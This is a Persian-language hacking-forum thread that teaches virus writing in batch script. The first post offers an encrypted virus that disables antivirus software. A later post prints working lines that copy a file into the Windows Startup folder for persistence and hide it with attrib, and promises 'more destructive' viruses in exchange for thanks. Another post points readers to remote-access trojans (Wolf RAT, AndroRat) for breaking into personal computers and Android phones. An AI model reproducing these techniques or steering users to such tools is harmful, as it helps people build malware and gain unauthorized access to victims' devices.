رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

پست های پیشنهاد شده

Antiviruse Ripper(v2)a

با سلام خدمت شما دوستان گرامی

من در شروع این اموزش ها براتون سورس یک نوع ویروس رو گزاشتم که انتی ویروس ها

رو غیر فعال میکرد......حال میخواهم یک نوع جید تر و بهتر انرا برایتان ضمیمه کنم

این نوع ان به یک روش ساده کریپت شده و در دسترس شما دوستان قرار گرفته که امیدوارم خوشتون بیاد

چون سورس این ویروس هم زیاد بود تو نود پد براتون اونرو ضمیمه میکنم تا کارتون راحت باشه...

این ویروس به زبان batch است و برای ساخت ان باید سورس ویروس را در درون نود پد کپی کرده وانرا با پسوندbat ذخیره کنید

تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشد ویروس هایی قوی تر و مخربتر به شما یاد خواهم داد

با تشکر

This is the hidden content, please

پسورد فایــل : guardiran.org

با تشکر از شما دوستان گرامی

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

چند ترفند کاربردی برای ویروس نویسی(1)

با سلام خدمت شما دوستان گرامی

دوستان در این تاپیک میخواهم برای شما چند قطعه سورس رو قرار دهم که به کمک انها کار های جالبی

را میتوانید با سیستم قربانی انجام دهید.......

این سورس ها همه به زبان batch میباشد و میتوانید با سورس ویروس های قبلی ترکیب کنید

/emoticons/biggrin@2x.png 2x" width="20" height="20" />

1_ با این سورس میتوانید ویروستون رو در کل درایور های کامپیوتر پخش کنید و انرا همزمان با هم اجرا کنید

2_با این سورس میتوانید ویروس خودتون رو در کل فولدر های کامپیوتر پخش کنیم

3_الوده کردن استارت اپ کامپیوتر

rem ---------------------------------
rem Infect Startup Folder
copy %0 "%userprofile%\Start Menu\Programs\Startup"

4_مخفی شدن ویروس بعد از کلیک کردن روی ان

rem Hide Virus File After Run
attrib +h %0

5_بازو بسته کردن سی دی رام

سورس اسن یکی رو توی نود پد زیر براتون ذخیره کردم....

تشکر هم فراموش نشود هر چه استقبال ها بیشتر باشد ویروس هایی قوی تر و مخربتر به شما یاد خواهم داد

با تشکر

لینک به دیدگاه

• 4 هفته بعد...

با سلام

دوستان عزیز اینجا تاپیک اموزس هستش و چون میخوایم اموزش ها کوتاهتر بشه و در صفحات کمتری جا بشه لطف

کنید و سوالاتتون و درخواست هاتون رو به صورت پیام خصوصی به فردی که اموزش ها رو میزاره بدین و این رو بدونین که اسپم

همون زدن تاپیک بدون هدف اموزشی در اموزش هاست یعنی سوال هاتون و در خواست ها و حتی تشکر کردن در قالب پست یک اسپم

محسوب میشه......خخخخخ خودمم الان دارم 

/emoticons/tongue@2x.png 2x" width="20" height="20" />  اسپم میدم ولی چ.ن دیدم دوستان با گفتن این جمله ی(( اسپم ندید )) ناراحت

میشن گفتم که کامل توضیح بدم ....اگر که نمیدونین چجوری میشه  پیام خصوصی بدین کافیه روی عکس نویسنده ی مطلب کلیک کنید و

در نمایش مشخصات کاربر روی ارسال پیام کلیک کنید و اگر هم که سوالی داشتین بر روی اینک زیر کلیک کنید تا در اونجا با درمیون

گذاشتن سوالتون کمک کنید بقیه هم از جواب بهره بگیرند

http://guardiran.org/forums/topic/1450-درخواست-ویروس/?p=6229

خب چون نمیخوام همش در مورد در خواست هاتون توضیح بدم توضیح بدم  بهتره کمی هم اموزش بدم تا این پست اسم محسوب نشه....

**در مورد جواب دوستم( badboy20) باید بگم که میتونین از رت (rat) استفاده کنین که این رت به معنیRemote Administration Tool

یا مدیریت و دسترسی از راه دور هستش که اموزشش هم در انجمن به همراه انواع اون موجوده که در لینک های زیر براتون گزاشتم

اموزش http://guardiran.org/forums/topic/1829-اموزش-کار-با-رت-wolf-rat-v-21-برای-نفوذ-به-سیستم-های-شخصی/?p=6974

خود نرم افزار http://guardiran.org/forums/topic/1772-نرم-افزار-بایندرو-نرم-افزار-های-مربوطه-به-ویروس-ن/?p=6891

. در جواب دوست دیگر هم(Mahdi95bk) باید بگم که میتونید از اندرورت(androrat) استفاده کنین که اموزش اون هم به همراه  خود نرم افزار در

انجمن موجوده که میتونین به لینک های زیر مراجعه کنید

اینم لینک نرم افزار به همراه اموزش

http://guardiran.org/forums/topic/1883-اموزش-هک-اندروید-با-androrat/?p=7235

و در جواب دوست دیگم  اقای( cracker21 ) هم باید بگم که زمانی که میخواهید به دوستان جواب بدین ببینید در

چه سطحی هستند . جواب بدین و یا در جوابی که میدهید یک پاسخ کامل بدهید و اگر اموزش ان در انجمن مود هست به دوستان لینک انرا

معرفی کنید تا دوستان مبتدی گیج نشوند ......اینم از لینک اموزش هک اندروید با کالی لینوکس

/emoticons/happy@2x.png 2x" width="20" height="20" />

http://guardiran.org/forums/topic/1773-تاپیک-جامع-آموزش-های-کالی/?p=8143

پس میبینید که به اکثر درخواست های شما عزیزان در انجمن پاسخ داده شده و اگر که به جست و جو بپردازین غیر ممکن هست که به نتیجه نرسد

پس لطفا به قوانین توجه کنید و به انها احترام بزارین چون این قوانین برای بهبود کار انجمن و نظم دادن به ان به وضع شده اند

ازتون خواهش میکنم که اگر سوالی داشتین به یکی از دوستان در انجمن پیام بدین و از اون  فرد درخواست کمک کنید تا بهتون کمک کنه و اینو بدونید که

قطعا کمک میکنن .......

ببخشید اگر که سرتون رو درد اوردم  وازتون ممنونم که تا الان با این تایپیک همراه ما بودین

با تشکر

/emoticons/biggrin@2x.png 2x" width="20" height="20" />

لینک به دیدگاه

• 3 ماه بعد...

باسلام خدمت شما دوستان گرامی

به دلیل استقبال شما دوستان گرامی از این زبان (batch programming)براین شدم که

یک کتاب اموزشی در این مورد براتون ضمیمه کنم ......

یاد گیری این زبان به قدری راحته که اگر کمی زبان انگلیسی کار کرده باشید میتونید طریقه ی

کار این زبان رو متوجه بشید.متاسفانه منبع فارسی برای یادگیری این زبان در دسترس نیست که

براتون پیوست کنم و کتابی رو که الان دارم براتون ضمیمه میکنم هم به زبان اصلیه :اما باز هم

برای شروع کتاب خوبیه.....

امیدوارم که بتونید ازش نهایت استفاده رو ببرید

با تشکر از شما دوستان گرامی

لینک به دیدگاه

مهمان
این موضوع برای عدم ارسال قفل گردیده است.
  • ایجاد مورد جدید...